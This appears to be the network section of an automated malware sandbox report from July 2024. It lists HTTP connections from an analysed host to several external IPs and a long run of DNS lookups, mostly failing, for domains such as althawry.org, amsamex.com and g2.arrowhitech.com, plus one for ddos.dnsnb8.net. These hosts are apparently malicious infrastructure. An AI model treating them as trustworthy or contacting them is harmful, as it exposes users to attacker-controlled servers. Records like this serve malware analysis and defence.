                                  Jul 5, 2024 08:04:25.132369995 CEST804998837.230.104.89192.168.2.9
                                  Jul 5, 2024 08:04:25.831979990 CEST804998837.230.104.89192.168.2.9
                                  Jul 5, 2024 08:04:25.832098961 CEST4998880192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:25.849773884 CEST4998880192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:25.850083113 CEST4998980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:25.854934931 CEST804998937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:04:25.854998112 CEST4998980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:25.855180025 CEST804998837.230.104.89192.168.2.9
                                  Jul 5, 2024 08:04:25.855256081 CEST4998880192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:25.855887890 CEST4998980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:25.861423016 CEST804998937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:04:26.566907883 CEST804998937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:04:26.567070961 CEST4998980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:26.722528934 CEST4999080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:04:26.727415085 CEST804999054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:04:26.727947950 CEST4999080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:04:26.728281975 CEST4999080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:04:26.733752012 CEST804999054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:04:27.478210926 CEST804999054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:04:27.478271961 CEST4999080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:04:27.478332996 CEST804999054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:04:27.478379011 CEST4999080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:04:27.480340004 CEST4999080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:04:27.482455015 CEST4999180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:27.485203981 CEST804999054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:04:27.487332106 CEST804999144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:04:27.487411022 CEST4999180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:27.487509966 CEST4999180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:27.492296934 CEST804999144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:04:28.014261961 CEST804999144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:04:28.014283895 CEST804999144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:04:28.016995907 CEST4999180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:28.016995907 CEST4999180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:28.026875019 CEST804999144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:04:28.039827108 CEST4999280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:28.045558929 CEST804999244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:04:28.048136950 CEST4999280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:28.048136950 CEST4999280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:28.053189993 CEST804999244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:04:28.542862892 CEST804999244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:04:28.542988062 CEST4999280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:28.543019056 CEST804999244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:04:28.543082952 CEST4999280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:28.545042038 CEST4999280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:28.549782038 CEST804999244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:04:28.553872108 CEST4998780192.168.2.978.46.2.155
                                  Jul 5, 2024 08:04:28.554285049 CEST4999380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:04:28.558818102 CEST804998778.46.2.155192.168.2.9
                                  Jul 5, 2024 08:04:28.558887005 CEST4998780192.168.2.978.46.2.155
                                  Jul 5, 2024 08:04:28.559073925 CEST804999378.46.2.155192.168.2.9
                                  Jul 5, 2024 08:04:28.559175014 CEST4999380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:04:28.559508085 CEST4999380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:04:28.564217091 CEST804999378.46.2.155192.168.2.9
                                  Jul 5, 2024 08:04:29.210875034 CEST804999378.46.2.155192.168.2.9
                                  Jul 5, 2024 08:04:29.210930109 CEST4999380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:04:29.297223091 CEST4998980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:29.297780991 CEST4999480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:29.304109097 CEST804998937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:04:29.304153919 CEST4998980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:29.304385900 CEST804999437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:04:29.304438114 CEST4999480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:29.304615021 CEST4999480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:29.309402943 CEST804999437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:04:30.032567024 CEST804999437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:04:30.035864115 CEST4999480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:30.037173033 CEST4999480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:30.037462950 CEST4999580192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:30.042201042 CEST804999437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:04:30.042323112 CEST804999537.230.104.89192.168.2.9
                                  Jul 5, 2024 08:04:30.043853045 CEST4999480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:30.043884039 CEST4999580192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:30.044059992 CEST4999580192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:30.049881935 CEST804999537.230.104.89192.168.2.9
                                  Jul 5, 2024 08:04:30.756135941 CEST804999537.230.104.89192.168.2.9
                                  Jul 5, 2024 08:04:30.757013083 CEST4999580192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:30.901422977 CEST4999680192.168.2.954.244.188.177
                                  Jul 5, 2024 08:04:30.906261921 CEST804999654.244.188.177192.168.2.9
                                  Jul 5, 2024 08:04:30.907861948 CEST4999680192.168.2.954.244.188.177
                                  Jul 5, 2024 08:04:30.907999992 CEST4999680192.168.2.954.244.188.177
                                  Jul 5, 2024 08:04:30.912972927 CEST804999654.244.188.177192.168.2.9
                                  Jul 5, 2024 08:04:31.636956930 CEST804999654.244.188.177192.168.2.9
                                  Jul 5, 2024 08:04:31.637023926 CEST804999654.244.188.177192.168.2.9
                                  Jul 5, 2024 08:04:31.637028933 CEST4999680192.168.2.954.244.188.177
                                  Jul 5, 2024 08:04:31.637095928 CEST4999680192.168.2.954.244.188.177
                                  Jul 5, 2024 08:04:31.648371935 CEST4999680192.168.2.954.244.188.177
                                  Jul 5, 2024 08:04:31.650593996 CEST4999780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:31.653492928 CEST804999654.244.188.177192.168.2.9
                                  Jul 5, 2024 08:04:31.655443907 CEST804999744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:04:31.659787893 CEST4999780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:31.659976006 CEST4999780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:31.665208101 CEST804999744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:04:32.329586029 CEST804999744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:04:32.329607010 CEST804999744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:04:32.329664946 CEST804999744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:04:32.329668999 CEST4999780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:32.329718113 CEST4999780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:32.329718113 CEST4999780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:32.339518070 CEST4999780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:32.346259117 CEST804999744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:04:32.363142967 CEST4999880192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:32.368057013 CEST804999844.221.84.105192.168.2.9
                                  Jul 5, 2024 08:04:32.368154049 CEST4999880192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:32.368994951 CEST4999880192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:32.373855114 CEST804999844.221.84.105192.168.2.9
                                  Jul 5, 2024 08:04:32.864615917 CEST804999844.221.84.105192.168.2.9
                                  Jul 5, 2024 08:04:32.864650011 CEST804999844.221.84.105192.168.2.9
                                  Jul 5, 2024 08:04:32.864711046 CEST4999880192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:32.864789009 CEST4999880192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:32.869793892 CEST4999880192.168.2.944.221.84.105
                                  Jul 5, 2024 08:04:32.872291088 CEST4999380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:04:32.872291088 CEST4999980192.168.2.978.46.2.155
                                  Jul 5, 2024 08:04:32.874758005 CEST804999844.221.84.105192.168.2.9
                                  Jul 5, 2024 08:04:32.877137899 CEST804999978.46.2.155192.168.2.9
                                  Jul 5, 2024 08:04:32.877229929 CEST4999980192.168.2.978.46.2.155
                                  Jul 5, 2024 08:04:32.877456903 CEST804999378.46.2.155192.168.2.9
                                  Jul 5, 2024 08:04:32.877541065 CEST4999380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:04:32.879196882 CEST4999980192.168.2.978.46.2.155
                                  Jul 5, 2024 08:04:32.882544994 CEST4999580192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:32.884231091 CEST804999978.46.2.155192.168.2.9
                                  Jul 5, 2024 08:04:32.887550116 CEST804999537.230.104.89192.168.2.9
                                  Jul 5, 2024 08:04:32.887614965 CEST4999580192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:33.529721975 CEST804999978.46.2.155192.168.2.9
                                  Jul 5, 2024 08:04:33.529788017 CEST4999980192.168.2.978.46.2.155
                                  Jul 5, 2024 08:04:33.576555967 CEST5000080192.168.2.937.230.104.89
                                  Jul 5, 2024 08:04:33.581479073 CEST805000037.230.104.89192.168.2.9
                                  Jul 5, 2024 08:04:33.581547976 CEST5000080192.168.2.937.230.104.89
                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                  Jul 5, 2024 08:03:47.499094963 CEST192.168.2.91.1.1.10xe17Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:48.828450918 CEST192.168.2.91.1.1.10xc1ebStandard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:50.123804092 CEST192.168.2.91.1.1.10x3db1Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:53.067485094 CEST192.168.2.91.1.1.10x95f9Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:56.024960995 CEST192.168.2.91.1.1.10xe4fcStandard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:58.521761894 CEST192.168.2.91.1.1.10xb275Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:02.101398945 CEST192.168.2.91.1.1.10x723dStandard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:03.692785025 CEST192.168.2.91.1.1.10x6de7Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:05.303884029 CEST192.168.2.91.1.1.10x58d5Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:10.886929035 CEST192.168.2.91.1.1.10x157eStandard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:12.159807920 CEST192.168.2.91.1.1.10xca3dStandard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:13.794507980 CEST192.168.2.91.1.1.10x3431Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:15.056780100 CEST192.168.2.91.1.1.10xdce1Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:17.947072029 CEST192.168.2.91.1.1.10x4d13Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:20.877856016 CEST192.168.2.91.1.1.10x4a41Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:23.775285006 CEST192.168.2.91.1.1.10x2488Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:25.026144981 CEST192.168.2.91.1.1.10xac1dStandard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:26.697851896 CEST192.168.2.91.1.1.10x9007Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:28.023828983 CEST192.168.2.91.1.1.10xf5c0Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:33.553235054 CEST192.168.2.91.1.1.10x6bc6Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:35.600212097 CEST192.168.2.91.1.1.10xe271Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:37.174834013 CEST192.168.2.91.1.1.10x3f7cStandard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:38.449553967 CEST192.168.2.91.1.1.10x6530Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:40.481334925 CEST192.168.2.91.1.1.10x6f1bStandard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:43.067888021 CEST192.168.2.91.1.1.10x9b9fStandard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:45.949203014 CEST192.168.2.91.1.1.10x59cbStandard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:49.002238989 CEST192.168.2.91.1.1.10x678fStandard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:51.526016951 CEST192.168.2.91.1.1.10xc9a2Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:54.414920092 CEST192.168.2.91.1.1.10x6859Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:57.246725082 CEST192.168.2.91.1.1.10xb388Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:57.280215979 CEST192.168.2.91.1.1.10xb388Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:59.307744026 CEST192.168.2.91.1.1.10x679cStandard query (0)amsamex.comA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jul 5, 2024 08:00:51.443166018 CEST1.1.1.1192.168.2.90xd4e7No error (0)windowsupdatebg.s.llnwi.net46.228.146.128A (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:00:56.758446932 CEST1.1.1.1192.168.2.90xce96No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:00:58.372610092 CEST1.1.1.1192.168.2.90x7c57Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:00:58.499944925 CEST1.1.1.1192.168.2.90x5048No error (0)www.careerdesk.org54.244.188.177A (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:00:59.506690025 CEST1.1.1.1192.168.2.90x278dNo error (0)arthur.niria.biz44.221.84.105A (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:00.110564947 CEST1.1.1.1192.168.2.90x1847Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:00.340749979 CEST1.1.1.1192.168.2.90x35a2No error (0)apple-pie.in44.221.84.105A (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:00.908406019 CEST1.1.1.1192.168.2.90x19f5No error (0)ahmediye.net78.46.2.155A (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:01.629900932 CEST1.1.1.1192.168.2.90xb7efName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:02.684145927 CEST1.1.1.1192.168.2.90x4145No error (0)ampyazilim.com.tr37.230.104.89A (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:02.688806057 CEST1.1.1.1192.168.2.90x4145No error (0)ampyazilim.com.tr37.230.104.89A (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:03.987617016 CEST1.1.1.1192.168.2.90xb2c9Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:05.314321995 CEST1.1.1.1192.168.2.90x74b8Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:06.613374949 CEST1.1.1.1192.168.2.90x4f6bName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:11.694328070 CEST1.1.1.1192.168.2.90x86b2Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:13.070161104 CEST1.1.1.1192.168.2.90x3037Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:14.287586927 CEST1.1.1.1192.168.2.90xffd1Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:19.703089952 CEST1.1.1.1192.168.2.90xa7b4Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:20.992537975 CEST1.1.1.1192.168.2.90xc059Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:22.233885050 CEST1.1.1.1192.168.2.90xa51fName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:27.000699997 CEST1.1.1.1192.168.2.90xdde2Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:28.320081949 CEST1.1.1.1192.168.2.90x180aName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:29.567009926 CEST1.1.1.1192.168.2.90xf14fName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:34.563486099 CEST1.1.1.1192.168.2.90x36f8Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:35.869797945 CEST1.1.1.1192.168.2.90x4c83Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:37.107933044 CEST1.1.1.1192.168.2.90x99b5Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:40.334580898 CEST1.1.1.1192.168.2.90xa062Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:42.723026991 CEST1.1.1.1192.168.2.90x699aName error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:45.412585974 CEST1.1.1.1192.168.2.90x119fName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:47.812868118 CEST1.1.1.1192.168.2.90xb91eName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:50.281173944 CEST1.1.1.1192.168.2.90x3edfName error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:52.876668930 CEST1.1.1.1192.168.2.90xd99fName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:55.282987118 CEST1.1.1.1192.168.2.90x4e4fName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:01:57.725929976 CEST1.1.1.1192.168.2.90xa8e6Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:00.621577978 CEST1.1.1.1192.168.2.90xe2b5Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:03.118643999 CEST1.1.1.1192.168.2.90x9521Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:05.510930061 CEST1.1.1.1192.168.2.90xea2Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:08.026454926 CEST1.1.1.1192.168.2.90xa1e6Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:10.523000956 CEST1.1.1.1192.168.2.90x15a2Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:12.960856915 CEST1.1.1.1192.168.2.90xef15Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:15.680389881 CEST1.1.1.1192.168.2.90xb721Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:18.231976032 CEST1.1.1.1192.168.2.90xd63cName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:21.578538895 CEST1.1.1.1192.168.2.90xdfa3Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:24.121613979 CEST1.1.1.1192.168.2.90x7786Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:26.511472940 CEST1.1.1.1192.168.2.90xeb4fName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:29.080622911 CEST1.1.1.1192.168.2.90x3913Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:32.211988926 CEST1.1.1.1192.168.2.90x6005Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:34.754734039 CEST1.1.1.1192.168.2.90x3322Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:37.276307106 CEST1.1.1.1192.168.2.90x23ccName error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:39.956608057 CEST1.1.1.1192.168.2.90x7e37Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:42.563149929 CEST1.1.1.1192.168.2.90x5b54Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:45.679330111 CEST1.1.1.1192.168.2.90x482bName error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:47.198189974 CEST1.1.1.1192.168.2.90x6b4aName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:48.480132103 CEST1.1.1.1192.168.2.90x585Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:50.227901936 CEST1.1.1.1192.168.2.90xc784Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:53.151412010 CEST1.1.1.1192.168.2.90x4397Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:56.106571913 CEST1.1.1.1192.168.2.90x725fName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:02:59.475595951 CEST1.1.1.1192.168.2.90x5e56Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:02.041233063 CEST1.1.1.1192.168.2.90xb922Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:04.094383001 CEST1.1.1.1192.168.2.90x360fName error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:05.517040968 CEST1.1.1.1192.168.2.90x110dName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:11.089432955 CEST1.1.1.1192.168.2.90xbeeName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:12.733059883 CEST1.1.1.1192.168.2.90x65acName error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:14.111745119 CEST1.1.1.1192.168.2.90xcfe1Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:16.955888033 CEST1.1.1.1192.168.2.90x8558Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:19.563560009 CEST1.1.1.1192.168.2.90x5beeName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:22.526101112 CEST1.1.1.1192.168.2.90x58bbName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:26.488653898 CEST1.1.1.1192.168.2.90x1283Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:27.752643108 CEST1.1.1.1192.168.2.90xa6acName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:28.998536110 CEST1.1.1.1192.168.2.90x94feName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:31.970398903 CEST1.1.1.1192.168.2.90xeed3Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:34.803834915 CEST1.1.1.1192.168.2.90x47e0Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:37.430257082 CEST1.1.1.1192.168.2.90x6905Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:39.019887924 CEST1.1.1.1192.168.2.90x9181Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:40.303546906 CEST1.1.1.1192.168.2.90x5ba3Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:45.795972109 CEST1.1.1.1192.168.2.90xeb28Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:47.514987946 CEST1.1.1.1192.168.2.90xe17Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:48.836306095 CEST1.1.1.1192.168.2.90xc1ebName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:50.132093906 CEST1.1.1.1192.168.2.90x3db1Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:53.074790955 CEST1.1.1.1192.168.2.90x95f9Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:56.033911943 CEST1.1.1.1192.168.2.90xe4fcName error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:58.530093908 CEST1.1.1.1192.168.2.90xb275Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:02.108762026 CEST1.1.1.1192.168.2.90x723dName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:03.701126099 CEST1.1.1.1192.168.2.90x6de7Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:05.311902046 CEST1.1.1.1192.168.2.90x58d5Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:10.894423962 CEST1.1.1.1192.168.2.90x157eName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:12.168991089 CEST1.1.1.1192.168.2.90xca3dName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:13.804615974 CEST1.1.1.1192.168.2.90x3431Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:15.065406084 CEST1.1.1.1192.168.2.90xdce1Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:17.954627037 CEST1.1.1.1192.168.2.90x4d13Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
